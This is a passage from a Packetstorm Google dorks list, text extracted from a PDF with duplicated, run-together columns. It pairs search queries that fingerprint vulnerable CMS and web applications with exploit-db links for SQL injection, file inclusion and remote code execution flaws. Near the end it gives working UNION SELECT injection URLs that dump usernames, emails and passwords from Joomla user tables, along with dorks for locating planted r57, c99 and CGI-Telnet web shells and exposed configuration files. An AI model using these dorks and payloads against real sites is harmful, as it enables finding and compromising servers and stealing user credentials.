Joomla Component BibTeX 1.3Remote Blind SQL Injection - CVE:2007-4502: http://www.exploit-db.com/exploits/4310

Page 394: Packetstorm Google Dorks List

allinurl:"shop.htm?shopMGID=" allinurl:"shop.htm?shopMGID="

CMS Ignition SQL Injection:http://www.exploit-db.com/exploits/14471

"By Geeklog""Created this pagein" +seconds+poweredinurl:public_html

"By Geeklog" "Created this pagein" +seconds +poweredinurl:public_html

Geeklog 1.6.0sr1 Remote ArbitraryFile Upload Vulnerability:http://www.exploit-db.com/exploits/9505

"nukeai beta3" "nukeai beta3"

PHP-Nuke NukeAI Module 3b(util.php) Remote File Include - CVE:2006-6255: http://www.exploit-db.com/exploits/2843

"Powered byUPB" "Powered by UPB"

Ultimate PHP Board 2.0b1(chat/login.php) Code Execution:http://www.exploit-db.com/exploits/2999

intitle:"owlintranet * owl"0.82

intitle:"owl intranet * owl" 0.82

OWL Intranet Engine 0.82(xrms_file_root) Code Execution -CVE: 2006-1149: http://www.exploit-db.com/exploits/1561

Copyright 2006-2009 InsaneVisions

Copyright 2006-2009 InsaneVisions

AdaptCMS Lite 1.5 Remote FileInclusion Vulnerability:http://www.exploit-db.com/exploits/10249

"powered byJAMM" "powered by JAMM"

JAMM CMS (id) Remote Blind SQLInjection - CVE: 2008-2755:http://www.exploit-db.com/exploits/5789

inurl:"printable_pedigree.php" inurl:"printable_pedigree.php"

Dog Pedigree Online Database 1.0.1bMultiple SQL Injection:http://www.exploit-db.com/exploits/8738

intext:"Poweredby Lore 1.5.6" intext:"Powered by Lore 1.5.6"

re 1.5.6 (article.php) Blind SQLInjection: http://www.exploit-db.com/exploits/7896

"powered byjmdcms.com" "powered by jmdcms.com"

JMD-CMS Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/15044

"Driven byDokuWiki" "Driven by DokuWiki"

DokuWiki 2006-03-09b (dwpage.php)System Disclosure: http://www.exploit-db.com/exploits/2322

intext:"Powered intext:"Powered by Pc4Uploader Pc4Uploader 9.0 Remote Blind SQL

Page 395: Packetstorm Google Dorks List

by Pc4Uploaderv9.0"

v9.0" Injection Vulnerability - CVE: 2009-1742: http://www.exploit-db.com/exploits/8709

"copyright 2006BroadbandMechanics"

"copyright 2006 BroadbandMechanics"

PeopleAggregator 1.2pre6-release-53Multiple RFI Vulnerabilities - CVE:2007-5631: http://www.exploit-db.com/exploits/4551

"powered byshutter v0.1.1" "powered by shutter v0.1.1"

Shutter 0.1.1 Multiple Remote SQLInjection Vulnerabilities - CVE: 2009-1650: http://www.exploit-db.com/exploits/8679

"Powered by PHPDirector 0.2" "Powered by PHP Director 0.2"

PHP Director 0.21 (sql into outfile)eval() Injection: http://www.exploit-db.com/exploits/8181

intitle:phpinfointext:"phpversion"+windows

intitle:phpinfo intext:"php version"+windows

PHP 5.x COM functions safe_modeand disable_function bypass - CVE:2007-5653: http://www.exploit-db.com/exploits/4553

"S-CMS bymatteoiamma" "S-CMS by matteoiamma"

S-CMS 2.0b3 Multiple SQL InjectionVulnerabilities: http://www.exploit-db.com/exploits/8914

inurl:"modules/articles/index.php?cat_id="

inurl:"modules/articles/index.php?cat_id="

XOOPS module Articles 1.03(index.php cat_id) SQL Injection -CVE: 2007-3311: http://www.exploit-db.com/exploits/3594

"by Pivot - 1.40.5"+'Dreadwind' -pivotlog.net

"by Pivot - 1.40.5" +'Dreadwind' -pivotlog.net

Pivot 1.40.5 Dreamwindload_template() Credentials Disclosure- CVE: 2008-3128: http://www.exploit-db.com/exploits/5973

"PHP EasyDownloader" "PHP Easy Downloader"

PHP Easy Downloader 1.5 (save.php)Remote Code Execution:http://www.exploit-db.com/exploits/2812

"Powered byLoudBlog" "Powered by LoudBlog"

LoudBlog 0.5 (id) SQL Injection /Admin Credentials Disclosure - CVE:2006-3832: http://www.exploit-db.com/exploits/2050

"Powered byvisinia" "Powered by visinia"

Visinia 1.3 Multiple Vulnerabilities -http://www.exploit-db.com/exploits/14879

"Powered bySeditio" "Powered by Seditio" Seditio CMS 121 Remote SQL

Injection - CVE: 2007-6202:

Page 396: Packetstorm Google Dorks List

http://www.exploit-db.com/exploits/4678

aspWebLinks 2.0 aspWebLinks 2.0

aspWebLinks 2.0 Remote SQLInjection / Admin Pass Change - CVE:2006-2848: http://www.exploit-db.com/exploits/1859

"Powered byBurning BoardLite 1.0.2" or"Powered byBurning Board2.3.6"

"Powered by Burning Board Lite1.0.2" or "Powered by BurningBoard 2.3.6"

Woltlab Burning Board 1.0.2, 2.3.6search.php SQL Injection - CVE:2007-0388: http://www.exploit-db.com/exploits/3143

inurl:/webquest/soporte_derecha_w.php?

inurl:/webquest/soporte_derecha_w.php?

PHP Webquest 2.5 (id_actividad)Remote SQL Injection - CVE: 2007-4920: http://www.exploit-db.com/exploits/4407

intext:"Poweredby pppblog" intext:"Powered by pppblog"

pppBlog 0.3.8 (randompic.php) SystemDisclosure - CVE: 2006-2770:http://www.exploit-db.com/exploits/1853

inurl:"printable_pedigree.php" inurl:"printable_pedigree.php"

Dog Pedigree Online Database 1.0.1bInsecure Cookie Handling:http://www.exploit-db.com/exploits/8739

"Powered byLifeType" "RSS0.90" "RSS 1.0""RSS 2.0" "ValidXHTML 1.0 Strictand CSS"

"Powered by LifeType" "RSS 0.90""RSS 1.0" "RSS 2.0" "ValidXHTML 1.0 Strict and CSS"

LifeType 1.0.4 SQL Injection / AdminCredentials Disclosure - CVE: 2006-2857: http://www.exploit-db.com/exploits/1874

"Powered byLeap" "Powered by Leap"

Leap CMS 0.1.4 (SQL/XSS/SU)Multiple Remote Vulnerabilities -CVE: 2009-1615: http://www.exploit-db.com/exploits/8577

inurl:pmwiki.php+"Page lastmodified on" |PmWikiPhilosophy

inurl:pmwiki.php +"Page lastmodified on" | PmWikiPhilosophy PmWiki

"Powered byUPB" "Powered by UPB"

Ultimate PHP Board 2.0(header_simple.php) File Include -CVE: 2006-7169: http://www.exploit-db.com/exploits/2721

Page 397: Packetstorm Google Dorks List

"BioScripts" "BioScripts"

MiniTwitter 0.2b Remote User OptionsChange - CVE: 2009-2574:http://www.exploit-db.com/exploits/8587

"Powered byClaroline" -demo "Powered by Claroline" -demo Claroline

inurl:sysinfo.cgiext:cgi inurl:sysinfo.cgi ext:cgi

SysInfo 1.21 (sysinfo.cgi) RemoteCommand Execution - CVE: 2006-1831: http://www.exploit-db.com/exploits/1677

"Powered byBurning Board" -exploit -johnny

"Powered by Burning Board" -exploit -johnny

Woltlab Burning Board Lite 1.0.2pl3e(pms.php) SQL Injection - CVE: 2007-0812: http://www.exploit-db.com/exploits/3262

"Welcome toExponent CMS" |"my new exponentsite"

"Welcome to Exponent CMS" | "mynew exponent site"

Exponent CMS 0.96.3 (view) RemoteCommand Execution - CVE: 2006-4963: http://www.exploit-db.com/exploits/2391

"Powered byPMOS Help Desk" "Powered by PMOS Help Desk"

PMOS Help Desk 2.4 RemoteCommand Execution - CVE: 2007-6550: http://www.exploit-db.com/exploits/4789

"Powered ByPligg" + "Legal:License andSource"

"Powered By Pligg" + "Legal:License and Source"

Pligg 9.9.0 Remote Code Execution -CVE: 2008-7091: http://www.exploit-db.com/exploits/6172

Powered.by.RaidenHTTPD+intitle:index.of |inurl:raidenhttpd-admin

Powered.by.RaidenHTTPD+intitle:index.of | inurl:raidenhttpd-admin

RaidenHTTPD 1.1.49(SoftParserFileXml) Remote CodeExecution - CVE: 2006-4723:http://www.exploit-db.com/exploits/2328

Site powered ByLimbo CMS Site powered By Limbo CMS

Limbo CMS 1.0.4.2 Cuid cookie BlindSQL Injection - CVE: 2008-0734:http://www.exploit-db.com/exploits/5088

inurl:naviid +inurl:liste9 inurl:naviid + inurl:liste9

Aiyoota! CMS - Blind SQL Injection:http://www.exploit-db.com/exploits/7490

"POWERED BYPHPNUKE.IR" "POWERED BY PHPNUKE.IR"

PHPnuke 8.2 Remote Upload File:http://www.exploit-db.com/exploits/14058

inurl:"com_gcalen inurl:"com_gcalendar" Joomla Component com_gcalendar

Page 398: Packetstorm Google Dorks List

dar" 1.1.2 (gcid) Remote SQL InjectionVulnerability - CVE: 2009-4099:http://www.exploit-db.com/exploits/10232

"toendaCMS isFree Softwarereleased under theGNU/GPLLicense." |"powered bytoendaCMS" -inurl:demo

"toendaCMS is Free Softwarereleased under the GNU/GPLLicense." | "powered bytoendaCMS" -inurl:demo

toendaCMS 1.0.0 (FCKeditor) RemoteFile Upload: http://www.exploit-db.com/exploits/2035

Powered byWikyBlog Powered by WikyBlog

WikyBlog v1.7.3rc2 MultipleVulnerabilities - CVE: 2010-0754:http://www.exploit-db.com/exploits/11560

"powered byyourtube" "powered by yourtube"

YourTube 2.0 Arbitrary DatabaseDisclosure: http://www.exploit-db.com/exploits/9073

"Powered bycpCommerce" "Powered by cpCommerce" cpCommerce

FhImage, poweredby Flash-here.com

FhImage, powered by Flash-here.com

Fhimage 1.2.1 Remote Index Change:http://www.exploit-db.com/exploits/7820

"Powered by: ArabPortal v2" "Powered by: Arab Portal v2"

Arab Portal v2.x (forum.php qc)Remote SQL Injection - CVE: 2009-2781: http://www.exploit-db.com/exploits/9320

"Powered by PHPiCalendar" "Powered by PHP iCalendar"

PHP iCalendar 2.24 (cookie_language)LFI / File Upload - CVE: 2008-5967:http://www.exploit-db.com/exploits/6519

POWERED BYALITALK POWERED BY ALITALK

ALITALK 1.9.1.1 Multiple RemoteVulnerabilities - CVE: 2008-0371:http://www.exploit-db.com/exploits/4922

Copyright 2010.Software Index Copyright 2010. Software Index

Software Index (Remote File Upload)Exploit: http://www.exploit-db.com/exploits/13999

"Powered byMDForum" "Powered by MDForum"

MDForum 2.0.1 (PNSVlang) RemoteCode Execution - CVE: 2006-6869:http://www.exploit-db.com/exploits/3057

Page 399: Packetstorm Google Dorks List

"Help * Contact *Imprint * Sitemap"| "powered bypapoo" | "poweredby cms papoo"

"Help * Contact * Imprint *Sitemap" | "powered by papoo" |"powered by cms papoo"

PAPOO 3_RC3 SQL Injection/AdminCredentials Disclosure - CVE: 2006-3571: http://www.exploit-db.com/exploits/1993

"Powered bymojoPortal" "Powered by mojoPortal"

mojoportal Multiple RemoteVulnerabilities - CVE: 2010-3602:http://www.exploit-db.com/exploits/15018

intitle:"login tocacti" intitle:"login to cacti"

Cacti 0.8.6i (copy_cacti_user.php)SQL Injection: http://www.exploit-db.com/exploits/3045

"BioScripts" "BioScripts"

MiniTwitter 0.3-Beta (SQL/XSS)Multiple Remote Vulnerabilities:http://www.exploit-db.com/exploits/8778

"Powered by PHPAdvanced TransferManager v1.30"

"Powered by PHP AdvancedTransfer Manager v1.30"

PHP Advanced Transfer Manager 1.30Source Code Disclosure:http://www.exploit-db.com/exploits/2968

Small BusinessManager Small Business Manager

Plesk Small Business Manager 10.2.0and Site Editor MultipleVulnerabilities: http://www.exploit-db.com/exploits/15313

"Powered bywebSPELL" "Powered by webSPELL"

webSPELL 4.2.0c Bypass BBCodeXSS Cookie Stealing Vulnerability -CVE: 2009-1408: http://www.exploit-db.com/exploits/8453

"Help * Contact *Imprint * Sitemap"| "powered bypapoo" | "poweredby cms papoo"

"Help * Contact * Imprint *Sitemap" | "powered by papoo" |"powered by cms papoo"

Papoo 3.02 (kontakt menuid) RemoteSQL Injection - CVE: 2007-2320:http://www.exploit-db.com/exploits/3739

"Powered byIMGallery" "Powered by IMGallery"

IMGallery 2.5 Create Uploader Script -CVE: 2007-0082: http://www.exploit-db.com/exploits/3049

intext:"Poweredby Plogger!" -plogger.org

intext:"Powered by Plogger!" -plogger.org

Plogger Beta 2.1 AdministrativeCredentials Disclosure:http://www.exploit-db.com/exploits/1621

"Powered byFreeWebshop.org2.2.1"

"Powered by FreeWebshop.org2.2.1"

FreeWebshop 2.2.1 Remote Blind SQLInjection - CVE: 2007-6466:http://www.exploit-

Page 400: Packetstorm Google Dorks List

db.com/exploits/4740

"powered by XHPCMS" "powered by XHP CMS"

XHP CMS 0.5 (upload) RemoteCommand Execution - CVE: 2006-1371: http://www.exploit-db.com/exploits/1605

"100% | 50% |25%" "Back togallery"inurl:"show.php?imageid="

"100% | 50% | 25%" "Back togallery" inurl:"show.php?imageid="

Easy Photo Gallery 2.1XSS/FD/Bypass/SQL Injection - CVE:2008-6988: http://www.exploit-db.com/exploits/6428

Portal By vbPortalVersion 3.5.0 Portal By vbPortal Version 3.5.0

vbPortal 3.0.2 3.6.0 b1 (cookie)Remote Code Excution - CVE: 2006-4004: http://www.exploit-db.com/exploits/2087

"Copyright @2007Iatek LLC" "Copyright @2007 Iatek LLC"

PortalApp 4.0 (SQL/XSS/AuthBypasses) Multiple RemoteVulnerabilities - CVE: 2008-4612:http://www.exploit-db.com/exploits/4848

"& Spider Friendlyby Crack" "& Spider Friendly by Crack"

phpBB Spider Friendly Module 1.3.10File Include - CVE: 2006-5665:http://www.exploit-db.com/exploits/2686

intitle:"login tocacti" intitle:"login to cacti"

Cacti 0.8.6i cmd.php popen() RemoteInjection: http://www.exploit-db.com/exploits/3029

Welcome to yourPHPOpenChat-Installation!

Welcome to your PHPOpenChat-Installation!

ADODB 4.70 (PhpOpenChat 3.0.x)Server.php SQL Injection:http://www.exploit-db.com/exploits/1652

"powered by TSEP- The SearchEngine Project"

"powered by TSEP - The SearchEngine Project"

TSEP 0.942.02 Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/9057

WEBalbum 2004-2006 duda WEBalbum 2004-2006 duda

WebAlbum 2.02pl COOKIE[skin2]Remote Code Execution - CVE: 2006-1480: http://www.exploit-db.com/exploits/1608

"Powered by PHP-Update" -site:www.php-update.co.uk

"Powered by PHP-Update" -site:www.php-update.co.uk PHP-Update

"Powered by "Powered by Zomplog" Zomplog 3.8.1 upload_files.php

Page 401: Packetstorm Google Dorks List

Zomplog" Arbitrary File Upload - CVE: 2007-5230: http://www.exploit-db.com/exploits/4466

intext:"Poweredby simplog" intext:"Powered by simplog"

Simplog 0.9.2 (s) Remote CommandsExecution - CVE: 2006-0146:http://www.exploit-db.com/exploits/1663

"Powered bySMF" "Powered by SMF"

Simple Machines Forum 1.1 rc2 localinclusion: http://www.exploit-db.com/exploits/2231

inurl:php-stats.js.php inurl:php-stats.js.php

Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() - CVE:2006-7173: http://www.exploit-db.com/exploits/3502

"Powered byMercuryBoard" "Powered by MercuryBoard"

MercuryBoard 1.1.4 (User-Agent)Remote SQL Injection:http://www.exploit-db.com/exploits/2247

"Powered byDrake CMS"inurl:index.php?option=guestbook

"Powered by Drake CMS"inurl:index.php?option=guestbook

Drake CMS 0.4.11 Remote Blind SQLInjection - CVE: 2008-6475:http://www.exploit-db.com/exploits/5391

"Driven byDokuWiki" "Driven by DokuWiki"

DokuWiki 2006-03-09b (dwpage.php)Remote Code Execution:http://www.exploit-db.com/exploits/2321

"powered by phpupdate" "powered by php update"

PHP-Update 2.7 (admin/uploads.php)Remote Code Execution - CVE: 2006-6878: http://www.exploit-db.com/exploits/3020

"powered by jaws"| "powered by thejaws project" |inurl:?gadget=search

"powered by jaws" | "powered bythe jaws project" |inurl:?gadget=search

Jaws 0.6.2 (Search gadget) RemoteSQL Injection - CVE: 2006-3292:http://www.exploit-db.com/exploits/1946/

Realizzatoutilizzando WebPortal

Realizzato utilizzando Web Portal

WebPortal CMS 0.6-beta RemotePassword Change - CVE: 2008-0142:http://www.exploit-db.com/exploits/4835

"powered byILIAS" "powered by ILIAS"

ILIAS LMS 3.9.9/3.10.7 ArbitraryEdition/Info Disclosure Vulns:http://www.exploit-db.com/exploits/9151

Page 402: Packetstorm Google Dorks List

"This site ispowered by CMSMade Simple"

"This site is powered by CMS MadeSimple"

CMS Made Simple 1.2.4 (FileManagermodule) File Upload - CVE: 2008-2267: http://www.exploit-db.com/exploits/5600

"FlatNuke" "ValidHTML 4.01!""Valid CSS!" "GetRSS 2.0 Feed""Get RSS

"FlatNuke" "Valid HTML 4.01!""Valid CSS!" "Get RSS 2.0 Feed""Get RSS

Flatnuke 2.5.8 file() Priv Escalation /Code Execution: http://www.exploit-db.com/exploits/2498

Copyright .Nucleus CMSv3.22 . ValidXHTML 1.0 Strict. Valid CSS . Backto top

Copyright . Nucleus CMS v3.22 .Valid XHTML 1.0 Strict . ValidCSS . Back to top

Nucleus CMS 3.22 (DIR_LIBS)Arbitrary Remote Inclusion - CVE:2006-2583: http://www.exploit-db.com/exploits/1816

"by eXtremeCrew" "by eXtreme Crew"

extreme-fusion 4.02 Remote CodeExecution: http://www.exploit-db.com/exploits/2937

"2007 RafalKucharski" "2007 Rafal Kucharski"

RTWebalbum 1.0.462 (AlbumID)Blind SQL Injection - CVE: 2009-1910: http://www.exploit-db.com/exploits/8648

"This forumpowered byPhorum."

"This forum powered by Phorum."

Phorum 5 (pm.php) Arbitrary LocalInclusion - CVE: 2006-3611:http://www.exploit-db.com/exploits/2008

"is proudlypowered byWordPress"

"is proudly powered by WordPress"

Wordpress 2.0.6 wp-trackback.phpRemote SQL Injection - CVE: 2007-0233: http://www.exploit-db.com/exploits/3109

"Powered byBurning BoardLite 1.0.2 * 2001-2004"

"Powered by Burning Board Lite1.0.2 * 2001-2004"

Woltlab Burning Board Lite 1.0.2Blind SQL Injection:http://www.exploit-db.com/exploits/2842

FhImage, poweredby Flash-here.com

FhImage, powered by Flash-here.com

Fhimage 1.2.1 Remote CommandExecution: http://www.exploit-db.com/exploits/7821

"FlatNuke" "ValidHTML 4.01!""Valid CSS!" "GetRSS 2.0 Feed""Get RSS

"FlatNuke" "Valid HTML 4.01!""Valid CSS!" "Get RSS 2.0 Feed""Get RSS

Flatnuke 2.5.8 (userlang) LocalInclusion / Delete All Users:http://www.exploit-db.com/exploits/2499

"powered by "powered by blur6ex" blur6ex 0.3.462 (ID) Admin Disclosure

Page 403: Packetstorm Google Dorks List

blur6ex" / Blind SQL Injection - CVE: 2006-3065: http://www.exploit-db.com/exploits/1904

"Powered byClaroline" -demo "Powered by Claroline" -demo

Claroline 1.7.4 (scormExport.inc.php)Remote Code Execution:http://www.exploit-db.com/exploits/1627

"Powered byBurning BoardLite 1.0.2 * 2001-2004"

"Powered by Burning Board Lite1.0.2 * 2001-2004"

Woltlab Burning Board Lite 1.0.2decode_cookie() SQL Injection - CVE:2006-6237: http://www.exploit-db.com/exploits/2841

"Personal .NETPortal" "Personal .NET Portal"

Personal.Net Portal MultipleVulnerabilities: http://www.exploit-db.com/exploits/15067

"SmodBIP" &"Aktualno.ci" "SmodBIP" & "Aktualno.ci"

SmodBIP 1.06 (aktualnosci zoom)Remote SQL Injection - CVE: 2007-1920: http://www.exploit-db.com/exploits/3678

"SmodCMS" &"S.ownik" "SmodCMS" & "S.ownik"

SmodCMS 2.10 (Slownik ssid) RemoteSQL Injection - CVE: 2007-1931:http://www.exploit-db.com/exploits/3679

"is a product ofLussumo" "is a product of Lussumo"

Vanilla 1.1.3 Remote Blind SQLInjection - CVE: 2007-5643:http://www.exploit-db.com/exploits/4548

inurl:"index.php?name=PNphpBB2"

inurl:"index.php?name=PNphpBB2"

PNphpBB2 1.2 (index.php c) RemoteSQL Injection - CVE: 2007-3052:http://www.exploit-db.com/exploits/4026

"Powered byOnline Grades" "Powered by Online Grades"

Online Grades & Attendance 3.2.6Credentials Changer SQL injection:http://www.exploit-db.com/exploits/8843

"Powered by PHPPhoto Album" "Powered by PHP Photo Album" phpAlbum

"Powered byClanTiger" "Powered by ClanTiger"

ClanTiger 1.1.1 Multiple CookieHandling Vulnerabilities:http://www.exploit-db.com/exploits/8471

"powered by phpphoto album" -

"powered by php photo album" -demo2 -pitanje"

PHP Album 0.3.2.3 Remote CommandExecution: http://www.exploit-

Page 404: Packetstorm Google Dorks List

demo2 -pitanje" db.com/exploits/1678

inurl:/modules/lykos_reviews/ inurl:/modules/lykos_reviews/

XOOPS Module Lykos Reviews 1.00(index.php) SQL Injection - CVE:2007-1817: http://www.exploit-db.com/exploits/3618

"Powered By X7Chat" "Powered By X7 Chat"

X7 Chat 2.0.4 (old_prefix) RemoteBlind SQL Injection - CVE: 2006-3851: http://www.exploit-db.com/exploits/2068

"powered byguestbook script" "powered by guestbook script"

GuestBook Script 1.7 (include_files)Remote Code Execution:http://www.exploit-db.com/exploits/1575

index.php?option=com_ezine index.php?option=com_ezine

Joomla Component D4JeZine 2.8Remote BLIND SQL Injection - CVE:2007-1776: http://www.exploit-db.com/exploits/3590

"This site ispowered bye107"|inurl:e107_plugins|e107_handlers|e107_files

"This site is powered bye107"|inurl:e107_plugins|e107_handlers|e107_files

e107 0.75 (GLOBALS Overwrite)Remote Code Execution:http://www.exploit-db.com/exploits/2268

inurl:/modules/xfsection/ inurl:/modules/xfsection/

XOOPS Module XFsection 1.07(articleid) BLIND SQL Injection -CVE: 2005-0725: http://www.exploit-db.com/exploits/3645

inurl:"phpwcms/index.php?id=" inurl:"phpwcms/index.php?id="

phpwcms 1.2.6 (Cookie:wcs_user_lang) Local File Include:http://www.exploit-db.com/exploits/2758

intext:"This site isusing phpGraphy"| intitle:"myphpgraphy site"

intext:"This site is usingphpGraphy" | intitle:"my phpgraphysite"

PHPGraphy 0.9.12 Privilege Escalation/ Commands Execution:http://www.exploit-db.com/exploits/2867

"CopyrightDevellion Limited2005. All rightsreserved."

"Copyright Devellion Limited 2005.All rights reserved."

CubeCart 3.0.11 (oid) Remote BlindSQL Injection - CVE: 2006-4267:http://www.exploit-db.com/exploits/2198

inurl:/modules/debaser/ inurl:/modules/debaser/

XOOPS Module debaser 0.92(genre.php) BLIND SQL Injection-CVE: 2007-1805: http://www.exploit-db.com/exploits/3630

Page 405: Packetstorm Google Dorks List

"Powered byQuick.Cms" "Powered by Quick.Cms"

Quick.Cms.Lite 0.3 (CookiesLanguage) Local File Include - CVE:2006-5834: http://www.exploit-db.com/exploits/2719

inurl:/modules/rmgallery/ inurl:/modules/rmgallery/

XOOPS Module RM+Soft Gallery 1.0BLIND SQL Injection - CVE: 2007-1806: http://www.exploit-db.com/exploits/3633

intext:"2000-2001The phpHeavenTeam"

intext:"2000-2001 The phpHeavenTeam"

phpMyChat 0.14.5 (SYS enter) RemoteCode Execution: http://www.exploit-db.com/exploits/1646

"Basado enSpirate" "Basado en Spirate"

Small Pirate v-2.1 (XSS/SQL) MultipleRemote Vulnerabilities - CVE: 2009-4936: http://www.exploit-db.com/exploits/8819

inurl:"lists/?p=subscribe" |inurl:"lists/index.php?p=subscribe"

inurl:"lists/?p=subscribe" |inurl:"lists/index.php?p=subscribe"

PHPList 2.10.2 GLOBALS[] RemoteCode Execution: http://www.exploit-db.com/exploits/1659

"Barbecued bysNews" "Barbecued by sNews"

sNews 1.5.30 Remote Reset AdminPass / Command Exec Exploit - CVE:2007-0261: http://www.exploit-db.com/exploits/3116

inurl:"printable_pedigree.php" inurl:"printable_pedigree.php"

Dog Pedigree Online Database 1.0.1bBlind SQL Injection:http://www.exploit-db.com/exploits/8740

"powered bydiscuz! "powered by discuz!

Discuz! 4.x SQL Injection / AdminCredentials Disclosure:http://www.exploit-db.com/exploits/2859

"LinPHA Version1.3.x" or "TheLinPHAdevelopers"

"LinPHA Version 1.3.x" or "TheLinPHA developers"

LinPHA 1.3.1 (new_images.php)Remote Blind SQL Injection - CVE:2007-4053: http://www.exploit-db.com/exploits/4242/

"Powered byClanTiger" "Powered by ClanTiger"

ClanTiger 1.1.1 (slug) Blind SQLInjection: http://www.exploit-db.com/exploits/8473

"AlumniServerproject" "AlumniServer project"

AlumniServer 1.0.1 (resetpwemail)Blind SQL Injection:http://www.exploit-db.com/exploits/9020

Page 406: Packetstorm Google Dorks List

"Powered bysendcard - anadvanced PHP e-card program"

"Powered by sendcard - anadvanced PHP e-card program"

SendCard 3.4.0 UnauthorizedAdministrative Access:http://www.exploit-db.com/exploits/2117

"This is a Free &Open Sourcemailing listmanager"

"This is a Free & Open Sourcemailing list manager" Open Newsletter

insite:SmarterMailEnterprise 7.1

SmarterMail Enterprise 7.1 http://www.exploit-db.com/exploits/15185

inurl:"com_sqlreport" inurl:"com_sqlreport"

Joomla Component user_idcom_sqlreport Blind SQL InjectionVulnerability - CVE: 2010-0753:http://www.exploit-db.com/exploits/11549

"Powered byQuick.Cart" "Powered by Quick.Cart"

Quick.Cart 2.2 RFI/LFI Remote CodeExecution Exploit - CVE: 2007-3138:http://www.exploit-db.com/exploits/4025

"Powered byShadowed Portal" "Powered by Shadowed Portal"

Shadowed Portal 5.7d3 RemoteCommand Execution Exploit:http://www.exploit-db.com/exploits/4768

"powered bybitweaver" "powered by bitweaver"

bitweaver 1.3 (tmpImagePath)Attachment mod_mime Exploit - CVE:2006-3105: http://www.exploit-db.com/exploits/1918

inurl:"index.php?ind=blog" inurl:"index.php?ind=blog"

MKPortal 1.2.1 Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/7796/

("powered bynocc"intitle:"NOCCWebmail") -site:sourceforge.net -Zoekinalles.nl -analysis

("powered by nocc" intitle:"NOCCWebmail") -site:sourceforge.net -Zoekinalles.nl -analysis

NOCC Webmail 1.0 (Local Inclusion)Remote Code Execution Exploit -CVE: 2006-0891: http://www.exploit-db.com/exploits/1522/

inurl:/level/15/exec/-/configure/http inurl:/level/15/exec/-/configure/http Default Cisco 2800 Series page

inurl:/exec/show/tech-support/cr inurl:/exec/show/tech-support/cr Default Cisco 2800 Series page

Page 407: Packetstorm Google Dorks List

inurl:/level/15/exec/- inurl:/level/15/exec/- Default Cisco 2800 Series page

inurl:"?delete"+intext:"PHPversion"+intext:"Safe_mode"

inurl:"?delete" +intext:"PHPversion" +intext:"Safe_mode"

Matches some well known phpshells(r57 and the like).

inurl:"?act=phpinfo" inurl:"?act=phpinfo" Match some well known phpshells (c99

and ironwarez and the like).

"Powered bySiteEngine" "Powered by SiteEngine"

SiteEngine 7.1 SQL injectionVulnerability: http://www.exploit-db.com/exploits/15612

inurl:"index.php?option=com_competitions"

inurl:"index.php?option=com_competitions"

SQL Injection:http://127.0.0.1/index.php?option=com_competitions&task=view&id=-9union all select1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 fromjos_users-- and XSS:http://127.0.0.1/index.php?option=com_competitions&menu=XroGuEAuthor: Ashiyane Digital SecurityTeam

inurl:"index.php?option=com_catalogue"

inurl:"index.php?option=com_catalogue"

Author: Ashiyane Digital SecurityTeam SQL Injection:http://server/index.php?option=com_catalogue&Itemid=73&cat_id=-999union select 1,version(),user(),4,5,6

inurl:index.php?option=com_doqment&cid=

inurl:index.php?option=com_doqment&cid=

Author: KedAns-Dzhttp://server/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

"Powered ByDejcom MarketCMS"

"Powered By Dejcom MarketCMS"

Submitter:Mormoroth PoC:http://server/showbrand.aspx?bc=%27or 1=(select top 1 table_name frominformation_schema.tables wheretable_name notin('bill','billdetail','cart','charge'))--

"SOOP Portal 2.0" "SOOP Portal 2.0"Submitted by: Net.Edit0r Shell Upload:http://www.exploit-db.com/exploits/15690

Page 408: Packetstorm Google Dorks List

inurl:index.php?option=com_lqm"showResults"

inurl:index.php?option=com_lqm"showResults"

Submitter: Snakespc SQL Injection:http://server/index.php?option=com_lqm&query=7&task=showResults&Itemid=158&lang=en&lqm_individual_id=-223+UNION SELECT1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12+from+cil_site.jos_us

intitle:PhpMyAdmin inurl:error.php

PhpMyAdmin Client Side 0DayCode Injection and Redirect LinkFalsification

intitle:PhpMyAdmin inurl:error.php

inurl:page.php?intPageID= inurl:page.php?intPageID=

Submitter: Srblche SQL Injection:http://server/page.php?intPageID=[SQL]

inurl:configuration.php-dist inurl:configuration.php-dist locates the default configuration file of

JOOMLA Author: ScOrPiOn

inurl:"config.php.new" +vbulletin inurl:"config.php.new" +vbulletin

locates the default configuration file forvBulletin (/includes/config.php.new)Author: MaXe

"[ phpinfo ] [php.ini ] [ cpu ] [mem ] [ users ] [tmp ] [ delete ]"

"[ phpinfo ] [ php.ini ] [ cpu ] [ mem] [ users ] [ tmp ] [ delete ]"

Locates r57 web shells Author:ScOrPiOn

"r57shell 1.4" "r57shell 1.4" Locates r57 web shells Author:ScOrPiOn

"r57shell" "r57shell" Locates r57 web shells Author:ScOrPiOn

"Powered bySOOP PortalRaven 1.0b"

"Powered by SOOP Portal Raven1.0b"

Submitter: Sun Army -http://www.exploit-db.com/exploits/15703

"safe_mode: *PHP version: *cURL: * MySQL:* MSSQL: *PostgreSQL: *Oracle: *"

"safe_mode: * PHP version: *cURL: * MySQL: * MSSQL: *PostgreSQL: * Oracle: *"

Locates r57 web shells Author:ScOrPiOn

"plugins/wp-db-backup/wp-db-backup.php"

"plugins/wp-db-backup/wp-db-backup.php"

Many of the results of the search showerror logs which give an attacker theserver side paths including the homedirectory name. This name is often alsoused for the login to ftp and shellaccess, which exposes the system toattack. Author: ScOrPiOn

Page 409: Packetstorm Google Dorks List

"www.*.com -c99shell" OR"www.*.net -c99shell" OR"www.*.org -c99shell"

"www.*.com - c99shell" OR"www.*.net - c99shell" OR"www.*.org - c99shell"

Locates c99 web shells Author:ScOrPiOn

"CGI-Telnet Unit-x Team Connectedto *.com" OR"CGI-Telnet Unit-x Team Connectedto"

"CGI-Telnet Unit-x TeamConnected to *.com" OR "CGI-Telnet Unit-x Team Connected to"

Locates CGI-Telnet web shells.Author: ScOrPiOn

inurl:phpinfo.php inurl:phpinfo.php

Locates phpinfo files. A phpinfo fileOutputs a large amount of informationabout the current state of PHP. Thisincludes information about PHPcompilation options and extensions, thePHP version, server information andenvironment , the PHP environment,OS version information, paths, masterand local values of configurationoptions, HTTP headers, and the PHPLicense. Author: ScOrPiOn

inurl:/vb/install/install.php inurl:/vb/install/install.php

